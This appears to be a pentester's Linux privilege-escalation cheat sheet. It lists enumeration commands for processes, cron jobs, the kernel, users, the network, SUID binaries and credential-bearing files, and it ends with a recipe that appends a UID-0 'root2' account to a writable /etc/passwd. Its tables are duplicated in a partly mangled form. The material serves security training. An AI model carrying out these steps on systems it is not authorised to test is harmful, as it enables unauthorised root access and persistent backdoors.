Enumerating Attack Vectors

Helpful Tools

Processes and Jobs

Command Description

Command	Description
`ps aux \| grep root`	See processes running as root
`./pspy64 -pf -i 1000`	View running processes with `pspy`
`ls -la /etc/cron.daily`	Check for daily Cron jobs
`grep "CRON" /var/log/syslog`	Enumerate cron jobs
`lpstat`	Look for active or queued print jobs to gain access to sensitive information

ps aux | grep root

See processes running as root

./pspy64 -pf -i 1000

View running processes with pspy

ls -la /etc/cron.daily

Check for daily Cron jobs

grep "CRON" /var/log/syslog

Enumerate cron jobs

lpstat

Look for active or queued print jobs to gain access to sensitive information

Kernel and OS

Command Description

Command	Description
`hostname`	Check the hostname (useful to ensure the target is in scope)
`uname -a`	Check the Kernel version
`cat /proc/version`	Check the Kernel version
`cat /etc/lsb-release`	Check the OS version
`cat /etc/os-release`	Check the OS version
`cat /etc/issue`	May contain information about the system version and release
`lscpu`	Gather additional information about the host
`sudo -V`	Check sudo version

hostname

Check the hostname (useful to ensure the target is in scope)

uname -a

Check the Kernel version

cat /proc/version

Check the Kernel version

cat /etc/lsb-release

Check the OS version

cat /etc/os-release

Check the OS version

cat /etc/issue

May contain information about the system version and release

lscpu

Gather additional information about the host

sudo -V

Check sudo version

Command Description

Command	Description
`echo $PATH`	Check the current user's PATH variable contents
`ps au`	See logged in users
`history`	Check the current user's Bash history
`whoami`	Check what user we are running as
`id`	Check what groups we belong to
`sudo -l`	Can the user run anything as another user?

echo $PATH

Check the current user's PATH variable contents

ps au

See logged in users

history

Check the current user's Bash history

whoami

Check what user we are running as

id

Check what groups we belong to

sudo -l

Can the user run anything as another user?

Command Description

Command	Description
`ip -a`	Check network interfaces
`ipconfig`	Check network interfaces
`hostname -I`	Display all IP addresses related to the host
`cat /etc/hosts`	Check for potential interesting hosts
`route`	Check out the routing table to see what other networks are available via which interface
`netstat -rn`	Check out the routing table to see what other networks are available via which interface
`arp -a`	Check the arp table to see what other hosts the target has been communicating with
`cat /etc/resolv.conf`	Check if the host is configured to use internal DNS → Starting point to query the Active Directory environment
`ss -tulpn`	Check listening services on both TCP and UDP ports
`netstat -tulpn`	Check listening services on both TCP and UDP ports
`ss -anp`	Display active connections and listening ports

ip -a

Check network interfaces

ipconfig

Check network interfaces

hostname -I

Display all IP addresses related to the host

cat /etc/hosts

Check for potential interesting hosts

route

Check out the routing table to see what other networks are available via which interface

netstat -rn

Check out the routing table to see what other networks are available via which interface

arp -a

Check the arp table to see what other hosts the target has been communicating with

cat /etc/resolv.conf

Check if the host is configured to use internal DNS → Starting point to query the Active Directory environment

ss -tulpn

Check listening services on both TCP and UDP ports

netstat -tulpn

Check listening services on both TCP and UDP ports

ss -anp

Display active connections and listening ports

Finding Interesting Files and Directories

Command Description

Command	Description
`find / -type f \( -name _hist -o -name _history \) -exec ls -l {} \; 2>/dev/null`	Find all accessible history files
`find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null`	Find world-writeable directories
`find / -type d -name ".*" -ls 2>/dev/null`	Find all hidden directories
`find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null`	Find all hidden files
`find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`	Find world-writeable files
`find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`	Find binaries with SUID bit set
`find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null`	Find binaries with SGID bit set
`find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;`	Enumerate binary files capabilities
`find / ! -path "/proc/" -iname "config" -type f 2>/dev/null`	Search config files
`find / -type f \( -name .conf -o -name .config \) -exec ls -l {} \; 2>/dev/null`	Search config files
`find / -type f -name "*.sh" 2>/dev/null \\| grep -v "src\\|snap\\|share"`	Find `.sh` scripts
`grep -r "word" /starting-path`	Resursively inspect file contents to find instances of "word":
`ls -l /tmp /var/tmp /dev/shm`	Find temporary files

find / -type f $ -name *_hist -o -name *_history $ -exec ls -l {} \; 2>/dev/null

Find all accessible history files

find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

Find world-writeable directories

find / -type d -name ".*" -ls 2>/dev/null

Find all hidden directories

find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null

Find all hidden files

find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

Find world-writeable files

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Find binaries with SUID bit set

find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Find binaries with SGID bit set

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;

Enumerate binary files capabilities

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

Search config files

find / -type f $ -name *.conf -o -name *.config $ -exec ls -l {} \; 2>/dev/null

Search config files

find / -type f -name "*.sh" 2>/dev/null \| grep -v "src\|snap\|share"

Find .sh scripts

grep -r "word" /starting-path

Resursively inspect file contents to find instances of "word":

ls -l /tmp /var/tmp /dev/shm

Find temporary files

Enumerating SUID binaries

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.

Obviously, for a quick win, you want to find SUID binaries having the root user as the file's owner.

HackTricks has a page where more info about this topic is explained.

You can find SUID binaries in many ways, the following are some example commands:

find / -perm -4000 2>/dev/null
find / -perm /4000 2>/dev/null
find / -perm /u+s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Other Tricks - Miscellaneous

This section contains some specific things which could help you find unusual vectors to escalate your privileges.

Writeable passwd file

Always check whether you have write permissions into the /etc/passwd file.

If that's the case, you can effectively set an arbitrary password for any account.

To check, use ls -la /etc/passwd

Supposing you have write permissions, you can generate a password hash and use it to log as root as follows:

Generate the password hash: openssl passwd w00t output: Fdzt.eqJQ4s0g
Append the password hash inside the passwd file: echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
Now you can login as root using su root2 and inserting w00t as the user's password

Last updated 4 months ago

Helpful Tools

Processes and Jobs

Kernel and OS

User-Related

Network Related

Finding Interesting Files and Directories

Enumerating SUID binaries

Other Tricks - Miscellaneous

Writeable passwd file